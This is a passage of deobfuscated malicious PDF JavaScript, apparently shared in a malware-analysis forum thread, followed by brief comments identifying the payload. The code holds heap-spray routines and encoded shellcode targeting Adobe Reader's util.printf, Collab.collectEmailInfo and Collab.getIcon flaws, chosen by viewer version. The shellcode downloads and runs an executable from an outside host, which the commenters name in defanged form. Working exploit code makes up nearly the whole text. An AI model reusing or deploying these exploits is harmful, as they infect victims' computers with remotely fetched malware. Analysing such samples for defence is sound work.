    var payload = unescape("%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u642F%u706D%u7472%u3377%u652E%u6578%u0000");
    var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A") var heapblock = nop + payload;
    var bigblock = unescape("%u0A0A%u0A0A");
    var headersize = 20;
    var spray = headersize + heapblock.length;
    while (bigblock.length < spray) {
        bigblock += bigblock;
    }
    var fillblock = bigblock.substring(0, spray);
    var block = bigblock.substring(0, bigblock.length - spray);
    while (block.length + spray < 0x40000) {
        block = block + block + fillblock;
    }
    var mem_array = new Array();
    for (var i = 0; i < 1400; i++) {
        mem_array[i] = block + heapblock;
    }
    var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
    util.printf("%45000f", num);
}
function collab_email()
{
    var shellcode = unescape("%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u622F%u6963%u716F%u7A78%u2E33%u7865%u0065");
    var mem_array = new Array();
    var cc = 0x0c0c0c0c;
    var addr = 0x400000;
    var sc_len = shellcode.length * 2;
    var len = addr - (sc_len + 0x38);
    var yarsp = unescape("%u9090%u9090");
    yarsp = fix_it(yarsp, len);
    var count2 = (cc - 0x400000) / addr;
    for (var count = 0; count < count2; count++) {
        mem_array[count] = yarsp + shellcode;
    }
    var overflow = unescape("%u0c0c%u0c0c");
    while (overflow.length < 44952) {
        overflow += overflow;
    }
    this.collabStore = Collab.collectEmailInfo({
        subj : "", msg : overflow
    });
}
function collab_geticon()
{
    if (app.doc.Collab.getIcon)
    {
        var arry = new Array();
        var vvpethya = unescape("%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u642F%u6A67%u6E6C%u3373%u652E%u6578%u0000");
        var hWq500CN = vvpethya.length * 2;
        var len = 0x400000 - (hWq500CN + 0x38);
        var yarsp = unescape("%u9090%u9090");
        yarsp = fix_it(yarsp, len);
        var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
        for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y++) {
            arry[vqcQD96y] = yarsp + vvpethya;
        }
        var tUMhNbGw = unescape("%09");
        while (tUMhNbGw.length < 0x4000) {
            tUMhNbGw += tUMhNbGw;
        }
        tUMhNbGw = "N." + tUMhNbGw;
        app.doc.Collab.getIcon(tUMhNbGw);
    }
}
function pdf_start()
{
    var version = app.viewerVersion.toString();
    version = version.replace(/\D/g, '');
    var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
    if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)) {
        util_printf();
    }
    if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)) {
        collab_email();
    }
    if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)) {
        collab_geticon();
    }
}
pdf_start();

shellcode download & execute file hxxp://got77.biz/peg/dmprtw3.exe

[SysAdMini]

Malware-Web-Threats )

shellcode download & execute file hxxp://got77.biz/peg/dmprtw3.exe

As mentioned earlier in this thread, file names change at each run. So it is not wrong what Anthony has posted.